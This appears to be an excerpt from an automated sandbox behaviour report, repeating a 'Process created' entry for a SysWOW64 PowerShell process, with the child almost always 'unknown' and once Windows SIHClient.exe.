Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv 2NlF6XCJtk6pGjotHbf1og.0.2	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
